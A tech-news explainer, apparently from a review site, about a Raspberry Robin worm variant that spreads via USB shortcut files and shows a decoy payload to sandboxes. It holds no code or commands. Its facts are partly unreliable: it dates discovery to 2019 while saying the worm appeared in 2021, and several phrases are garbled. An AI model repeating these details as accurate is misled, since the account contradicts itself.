Raspberry Robin Malware Captured Using A Clever Trick To Trick Security Analysts

In early 2019, researchers from the threat intelligence firm Red Canary discovered an infectious computer worm that had been present in customers’ environments since September 2021. According to a later analysis by Microsoft, this malware, dubbed “Raspberry Robin” by researchers, may date as far back as 2019 and has since integrated with a larger ecosystem of malware. New research by Trend Micro has uncovered an updated version of Raspberry Robin, which began spreading in September through telecommunications and government systems. This new variant attempts to deceive security researchers by hiding its true payload and deploying a dummy payload when it detects active security tools.

Raspberry Robin is classified as a computer worm by cybersecurity analysts due to its self-replicating nature. This worm spreads by copying itself from an infected machine to any attached USB drives, then infecting any future machines that connect to those USB drives. Raspberry Robin may not propagate as rapidly as worms that spread over the Internet or a local area network (LAN), but its spread via USB drives makes it hazardous in other ways. The worm can remain dormant on USB drives for extended periods, then reinfect previously infected computers. USB drive transmission also enables Raspberry Robin to traverse air gaps and infect systems without network access, such as offline archives containing sensitive data. If the worm employs data-destroying malware like ransomware, such an infection could be catastrophic.

Researchers have observed Raspberry Robin deploying a variety of malicious payloads, frequently as part of multi-stage infection chains that can result in ransomware deployment. According to Microsoft, this worm has become one of the largest malware distribution platforms, and threat actors may be paying Raspberry Robin’s developers to install specific payloads on infected machines. Therefore, Raspberry Robin has assumed the role of a malware dropper, infecting computers to install additional malware.

Unfortunately, it can be difficult for security researchers to detect and identify Raspberry Robin, let alone anti-virus software. The infection chain of the worm begins with a. LNK file on a USB flash drive. When the drive is connected to a Windows system and the user double-clicks the shortcut, an executable file is executed that instructs the legitimate msiexec.exe service to download and install a malicious file. MSI Windows Installer distribution. This malicious package contains a significant portion of the Raspberry Robin malware.

However, the malicious code is concealed by more than ten layers of obfuscation. At runtime, each layer of the malware works to sequentially unpack and decrypt the subsequent layer. When this process reaches the payload loader, the loader looks for sandboxing and security analytics tools. If such tools are detected, the loader decompresses and loads a bogus payload intended to deceive security researchers. Before downloading and installing adware, this bogus payload collects and exfiltrates system information. It is possible for security researchers observing this behavior to be misled into believing they have determined the full extent of the malware’s activity.

When the payload loader detects that neither a sandbox nor security analytics tools are active, it unpacks and loads the significantly more malicious real payload. It modifies the Windows registry to elevate its privileges, evades detection, and establish persistence on the compromised system by abusing user admin permissions. The actual payload also contains a Tor client that the malware uses to communicate with command-and-control (C2) servers controlled by the threat actors behind Raspberry Robin. Once threat actors have established a backdoor to an infected system, they can send additional malicious payloads for the malware to install and execute.

This new variant of Raspberry Robin demonstrates how far threat actors will go to create malware that can evade detection by security researchers and anti-virus software. To avoid becoming the next victim of this worm and others like it, users and organizations should always remain vigilant and avoid opening unfamiliar files, even if they appear to be safe upon inspection.

Why Trust Us?

Best Top Reviews Online was founded in 2018 to provide our readers with thorough, unbiased, and independent advice on what to buy. We now have millions of monthly users from all over the world and evaluate over 1,000 products per year.

The article above was written by the BestTopReviewsOnline team, which includes many of the US’s most knowledgeable technical experts. Our team includes well-known writers with extensive experience in mobile phones, computing, technology, photography, and other fields.

Related Stories

  • All Post
  • Best Picks
  • Explainers
  • How To
  • News
  • Versus

Get more info



Best Products

Buying Guides

Contact Us

About Us

We provide a platform for our customers to rate and review services and products, as well as the stores that sell them. We research and compare the most popular brands and models before narrowing it down to the top ten, providing you with the most comprehensive and reliable buying advice to help you make your decision.


BestTopReviewsOnline.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com. As an Amazon Associate I earn from qualifying purchases.


Address & Map

20 S Santa Cruz Ave, Suite 300, Los Gatos, CA 95030, United States

© 2022 BestTopReviewsOnline.com Pty. Ltd. All Rights Reserved. Licensing: All third-party trademarks, images, and copyrights used on this page are for comparative advertising, criticism, or review. As this is a public forum where users can express their opinions on specific products and businesses, the opinions expressed do not reflect those of BestTopReviewsOnline.com.